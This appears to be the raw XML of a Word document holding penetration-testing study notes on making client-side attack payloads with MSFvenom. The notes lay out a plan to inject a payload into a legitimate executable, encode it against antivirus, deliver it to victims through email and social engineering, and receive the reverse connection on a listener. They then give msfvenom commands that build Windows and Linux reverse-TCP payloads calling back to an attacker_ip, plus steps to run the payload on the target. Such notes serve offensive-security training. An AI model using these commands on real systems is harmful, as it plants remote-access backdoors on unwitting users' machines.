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8846" w14:textId="63E3B19E" w:rsidR="00853ABF" w:rsidRPr="0011595C" w:rsidRDefault="006B2805">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0011595C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Generating Payloads </w:t>
      </w:r>
      <w:r w:rsidR="00B7705E" w:rsidRPr="0011595C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r w:rsidRPr="0011595C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008851A5" w:rsidRPr="0011595C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MSFvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0011595C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8DC8A5" w14:textId="3519CA1C" w:rsidR="006B2805" w:rsidRDefault="006B2805"/>
    <w:p w14:paraId="50BAB645" w14:textId="2F022DEE" w:rsidR="00251D4F" w:rsidRDefault="0001550E">
      <w:r w:rsidRPr="00251D4F">
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="0001550E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>client</w:t>
      </w:r>
      <w:r w:rsidR="00251D4F" w:rsidRPr="00251D4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-side attack</w:t>
      </w:r>
      <w:r w:rsidR="00251D4F" w:rsidRPr="00251D4F">
        <w:t xml:space="preserve"> targets the </w:t>
      </w:r>
      <w:r w:rsidR="00251D4F" w:rsidRPr="00251D4F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>user’s device/browser/app</w:t>
      </w:r>
      <w:r w:rsidR="00251D4F" w:rsidRPr="00251D4F">
        <w:t xml:space="preserve"> (the client) rather than the server — the attacker makes the client run malicious code</w:t>
      </w:r>
      <w:r w:rsidR="00827872">
        <w:t>/payload that connect back to the attacker when executed</w:t>
      </w:r>
      <w:r w:rsidR="00251D4F" w:rsidRPr="00251D4F">
        <w:t xml:space="preserve"> or reveal secrets</w:t>
      </w:r>
      <w:r w:rsidR="00827872">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45950C46" w14:textId="77777777" w:rsidR="00827872" w:rsidRDefault="00827872"/>
    <w:p w14:paraId="7B088BC6" w14:textId="02FF9526" w:rsidR="00251D4F" w:rsidRDefault="00827872">
      <w:r>
        <w:t xml:space="preserve">Social engineering --- </w:t>
      </w:r>
      <w:r w:rsidR="00251D4F">
        <w:t>Human vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDCE6C8" w14:textId="77777777" w:rsidR="00251D4F" w:rsidRDefault="00251D4F"/>
    <w:p w14:paraId="3DFEDAF9" w14:textId="7C47BB66" w:rsidR="00251D4F" w:rsidRPr="0001550E" w:rsidRDefault="00961EC6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Plan:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270C1B7B" w14:textId="659CA679" w:rsidR="00251D4F" w:rsidRDefault="0001550E">
      <w:r>
        <w:t>Generate the malicious payload</w:t>
      </w:r>
      <w:r w:rsidR="00961EC6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AB08A9">
        <w:t>then i</w:t>
      </w:r>
      <w:r w:rsidR="00961EC6">
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="00AB08A9">
        <w:t>ject the payload</w:t>
      </w:r>
      <w:r w:rsidR="00961EC6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AB08A9">
        <w:t xml:space="preserve">into another window </w:t>
      </w:r>
      <w:r w:rsidR="0011595C">
        <w:t>executable</w:t>
      </w:r>
      <w:r w:rsidR="00AB08A9">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (either for window or </w:t>
      </w:r>
      <w:r w:rsidR="00827872">
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA869E7" w14:textId="65A389BF" w:rsidR="00827872" w:rsidRDefault="00AB08A9">
      <w:r>
        <w:t>Then distribute it to</w:t>
      </w:r>
      <w:r w:rsidR="00827872">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>client/target</w:t>
      </w:r>
      <w:r w:rsidR="00827872">
        <w:t xml:space="preserve"> system</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> either through email or other communication channels.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E7E778" w14:textId="1ADC8256" w:rsidR="0001550E" w:rsidRDefault="00AB08A9">
      <w:r>
        <w:t>Once it is on the system click on it (</w:t>
      </w:r>
      <w:r w:rsidR="0001550E">
        <w:t>Utilize social engineering techniques</w:t>
      </w:r>
      <w:r>
        <w:t>) and consequently execute the payload</w:t>
      </w:r>
      <w:r w:rsidR="0001550E">
        <w:t xml:space="preserve"> (to convince the client to click on </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0001550E">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="0011595C">
        <w:t>it</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0001550E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="0011595C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2814D9EB" w14:textId="24F0E069" w:rsidR="00AB08A9" w:rsidRDefault="00AB08A9">
      <w:r>
        <w:t>Now, we need to be ready with the handler/listener that receives the incoming connection and consequently gain access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E8309A" w14:textId="77777777" w:rsidR="00AB08A9" w:rsidRDefault="00AB08A9"/>
    <w:p w14:paraId="62486E63" w14:textId="3C8326C4" w:rsidR="00AB08A9" w:rsidRDefault="00AB08A9">
      <w:r>
        <w:t xml:space="preserve">As the payload is to store and execute on the client </w:t>
      </w:r>
      <w:r w:rsidR="006E6591">
        <w:t>system,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> we need to be </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cognisent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/aware of AV detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2449E4EA" w14:textId="753D5294" w:rsidR="00AB08A9" w:rsidRDefault="006E6591">
      <w:r>
        <w:t>Process of encoding (second doc)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E8BC04" w14:textId="61145E33" w:rsidR="006E6591" w:rsidRDefault="006E6591">
      <w:r>
        <w:t>Injecting it into the legitimate file. (third doc)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13940029" w14:textId="77777777" w:rsidR="00AB08A9" w:rsidRDefault="00AB08A9"/>
    <w:p w14:paraId="611D3663" w14:textId="26D943BF" w:rsidR="006E6591" w:rsidRPr="00C42332" w:rsidRDefault="006E6591">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C42332">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MSFvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C42332">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D2B416" w14:textId="7D0FA14E" w:rsidR="00C42332" w:rsidRDefault="006E6591">
      <w:r>
        <w:t>Generate and encode payload</w:t>
      </w:r>
      <w:r w:rsidR="00C42332">
        <w:t xml:space="preserve"> for Various </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C42332">
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C42332">
        <w:t xml:space="preserve"> and web servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B4C95B" w14:textId="2CAC8488" w:rsidR="00C42332" w:rsidRDefault="00C42332">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> utility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6CF874" w14:textId="77777777" w:rsidR="00C42332" w:rsidRDefault="00C42332"/>
    <w:p w14:paraId="1EE7F1AC" w14:textId="7E4EC5F5" w:rsidR="00C42332" w:rsidRDefault="00C42332">
      <w:r>
        <w:t>Combination of:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22237672" w14:textId="30FD84A9" w:rsidR="00C42332" w:rsidRDefault="00C42332">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Msfpayload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3F063946" w14:textId="107671F5" w:rsidR="00C42332" w:rsidRDefault="00C42332">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfencode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4CF5AD8E" w14:textId="75ADB60E" w:rsidR="00C42332" w:rsidRDefault="00C42332"/>
    <w:p w14:paraId="144E15CD" w14:textId="2CB442F2" w:rsidR="00C42332" w:rsidRDefault="00C42332">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A78F5F7" wp14:editId="0CE842BD">
            <wp:extent cx="5112000" cy="873224"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="1946119111" name="Picture 2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9111" name="Picture 2" descr="A close up of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293" cy="88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9D47" w14:textId="77777777" w:rsidR="00827872" w:rsidRDefault="00827872"/>
    <w:p w14:paraId="0A83827D" w14:textId="0E50D76D" w:rsidR="00C42332" w:rsidRDefault="00C42332">
      <w:r>
        <w:t>It helps in generation of both types of payloads:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245B2A1D" w14:textId="18AC8ED1" w:rsidR="00C42332" w:rsidRDefault="00C42332" w:rsidP="00C42332">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>staged payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452B7C85" w14:textId="37A4610A" w:rsidR="00C42332" w:rsidRPr="00C42332" w:rsidRDefault="00C42332" w:rsidP="00C42332">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>non-staged payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB4F595" w14:textId="77777777" w:rsidR="00C42332" w:rsidRDefault="00C42332">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68CDBD91" w14:textId="4E653BD3" w:rsidR="00C42332" w:rsidRPr="00C42332" w:rsidRDefault="00C42332">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C42332">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Demo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B8976C" w14:textId="67AD9FA4" w:rsidR="00C42332" w:rsidRDefault="00C42332">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB1A6D9" w14:textId="3376738C" w:rsidR="00C42332" w:rsidRDefault="00C42332">
      <w:r>
        <w:t># help documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20169EA3" w14:textId="77777777" w:rsidR="00C42332" w:rsidRDefault="00C42332"/>
    <w:p w14:paraId="1B3C7973" w14:textId="1ABBE23E" w:rsidR="00C42332" w:rsidRDefault="00C42332" w:rsidP="00C42332">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  --</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>list payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448C1AC7" w14:textId="3FC1000B" w:rsidR="00C42332" w:rsidRDefault="00C42332">
      <w:r>
        <w:t xml:space="preserve"># list out which payload we able to generate with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5E300C" w14:textId="77777777" w:rsidR="00961EC6" w:rsidRDefault="00961EC6"/>
    <w:p w14:paraId="23D6C4DA" w14:textId="47EFC209" w:rsidR="008E63C3" w:rsidRDefault="008E63C3">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> –list formats</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F1D79D" w14:textId="790E26E6" w:rsidR="008E63C3" w:rsidRDefault="008E63C3">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> formats in which we able create our payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B7EBC8" w14:textId="77777777" w:rsidR="007724E8" w:rsidRDefault="007724E8"/>
    <w:p w14:paraId="78055F56" w14:textId="23741FAE" w:rsidR="0001550E" w:rsidRPr="007724E8" w:rsidRDefault="00C42332">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007724E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t># for staged:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA06052" w14:textId="1F4C1D35" w:rsidR="007724E8" w:rsidRDefault="007724E8" w:rsidP="007724E8">
      <w:r>
        <w:t>platform/architecture/payload type/protocol to connect back to attacker system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A5B1BC" w14:textId="2B25E506" w:rsidR="007724E8" w:rsidRDefault="007724E8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007724E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>There is forward slash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B1ECF2" w14:textId="77777777" w:rsidR="007724E8" w:rsidRPr="007724E8" w:rsidRDefault="007724E8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="283C2C80" w14:textId="67CFD166" w:rsidR="007724E8" w:rsidRPr="007724E8" w:rsidRDefault="007724E8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007724E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t># for non-staged:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A852116" w14:textId="60FBD095" w:rsidR="007724E8" w:rsidRDefault="007724E8" w:rsidP="007724E8">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">platform/architecture/payload </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>type_protocol</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to connect back to attacker system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4389470D" w14:textId="1F9D94A1" w:rsidR="00C42332" w:rsidRPr="007724E8" w:rsidRDefault="00C376FC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007724E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>There</w:t>
      </w:r>
      <w:r w:rsidR="007724E8" w:rsidRPr="007724E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> is underscore.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2EDFD8" w14:textId="77777777" w:rsidR="008E63C3" w:rsidRDefault="008E63C3"/>
    <w:p w14:paraId="0018A1DA" w14:textId="2743C6D0" w:rsidR="00C42332" w:rsidRDefault="00FE3B41">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -a x86 -p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 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>attacker_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> LPORT=1234 -f exe &gt; /home/kali/Desktop/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C376FC">
        <w:t>windows_payloads</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C376FC">
        <w:t>/payloadx86.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2960841A" w14:textId="121F691A" w:rsidR="00C376FC" w:rsidRDefault="00C376FC"/>
    <w:p w14:paraId="4AE3AF3B" w14:textId="4ECF49F5" w:rsidR="00C376FC" w:rsidRDefault="00C376FC" w:rsidP="00C376FC">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -a x</w:t>
      </w:r>
      <w:r>
        <w:t>64</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -p windows</w:t>
      </w:r>
      <w:r>
        <w:t>/x64</w:t>
      </w:r>
      <w:r>
        <w:t>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 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>attacker_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> LPORT=1234 -f exe &gt; /home/kali/Desktop/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>windows_payloads</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/payloadx86.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B853AEC" w14:textId="77777777" w:rsidR="00C376FC" w:rsidRDefault="00C376FC"/>
    <w:p w14:paraId="7074B4EB" w14:textId="674F9728" w:rsidR="008E63C3" w:rsidRDefault="008E63C3">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/x86/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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>attacker_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  LPORT</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>1234  -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">f elf &gt; </w:t>
      </w:r>
      <w:r>
        <w:t>/home/kali/Desktop/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:r>
        <w:t>_payloads</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/payloadx86</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C15B168" w14:textId="77777777" w:rsidR="008E63C3" w:rsidRDefault="008E63C3"/>
    <w:p w14:paraId="0409FDC2" w14:textId="38BC18C1" w:rsidR="008E63C3" w:rsidRDefault="008E63C3" w:rsidP="008E63C3">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/x6</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>attacker_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  LPORT</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>1234  -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>f elf &gt; /home/kali/Desktop/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux_payloads</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/payloadx</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00D105E4">
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111C4183" w14:textId="77777777" w:rsidR="008E63C3" w:rsidRDefault="008E63C3"/>
    <w:p w14:paraId="3173BE5C" w14:textId="77777777" w:rsidR="008E63C3" w:rsidRDefault="008E63C3"/>
    <w:p w14:paraId="73539B89" w14:textId="750B0263" w:rsidR="008E63C3" w:rsidRDefault="008E63C3">
      <w:r>
        <w:t># we don’t provide extensions as the binary can be executed directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBD1D5B" w14:textId="097171AF" w:rsidR="008E63C3" w:rsidRDefault="008E63C3">
      <w:r>
        <w:t>#-a is not necessary as you mentioned in the payload line.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55284D25" w14:textId="77777777" w:rsidR="008E63C3" w:rsidRDefault="008E63C3"/>
    <w:p w14:paraId="07120BAD" w14:textId="652E35FB" w:rsidR="00C376FC" w:rsidRDefault="00C376FC">
      <w:r>
        <w:t>Cd Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1694ABE7" w14:textId="2F9BE886" w:rsidR="00C376FC" w:rsidRDefault="00C376FC">
      <w:r>
        <w:t>Ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B30628D" w14:textId="5ED90C87" w:rsidR="00C376FC" w:rsidRDefault="00C376FC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>now</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> move it to the target system and follow the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C376FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PLAN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4BD5F3" w14:textId="7CAE4BC8" w:rsidR="00C376FC" w:rsidRDefault="008E63C3">
      <w:r>
        <w:t xml:space="preserve">Cd </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux_payloads</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="15C67FC3" w14:textId="0C8E2504" w:rsidR="008E63C3" w:rsidRDefault="008E63C3">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  +</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>x payloadx86</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F812D69" w14:textId="1E52F66A" w:rsidR="008E63C3" w:rsidRDefault="008E63C3">
      <w:r>
        <w:t># giving it executable permission</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC0CAB0" w14:textId="77777777" w:rsidR="008E63C3" w:rsidRDefault="008E63C3"/>
    <w:p w14:paraId="766BCFC4" w14:textId="17AFB645" w:rsidR="008E63C3" w:rsidRDefault="008E63C3">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>payloadx64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D424D5E" w14:textId="688DE6CD" w:rsidR="008E63C3" w:rsidRDefault="008E63C3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>execute</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C1E3DE" w14:textId="59118B5A" w:rsidR="008E63C3" w:rsidRDefault="008E63C3">
      <w:r>
        <w:t xml:space="preserve"># on the attacker </w:t>
      </w:r>
      <w:r w:rsidR="00381307">
        <w:t>machine</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> if the handler/</w:t>
      </w:r>
      <w:r w:rsidR="00381307">
        <w:t>listener</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is set then it </w:t>
      </w:r>
      <w:r w:rsidR="00381307">
        <w:t>sends</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D515DF" w14:textId="77777777" w:rsidR="008E63C3" w:rsidRDefault="008E63C3"/>
    <w:p w14:paraId="7590A6C8" w14:textId="55E3F7FB" w:rsidR="00381307" w:rsidRDefault="00381307">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> way of transferring it to target depends upon the social engineering technique.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017E952F" w14:textId="77777777" w:rsidR="00381307" w:rsidRDefault="00381307"/>
    <w:p w14:paraId="1C007CEB" w14:textId="4A7A508F" w:rsidR="00381307" w:rsidRDefault="00381307">
      <w:r>
        <w:t xml:space="preserve">I </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>use  web</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> server, to serve the file and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>download</w:t>
      </w:r>
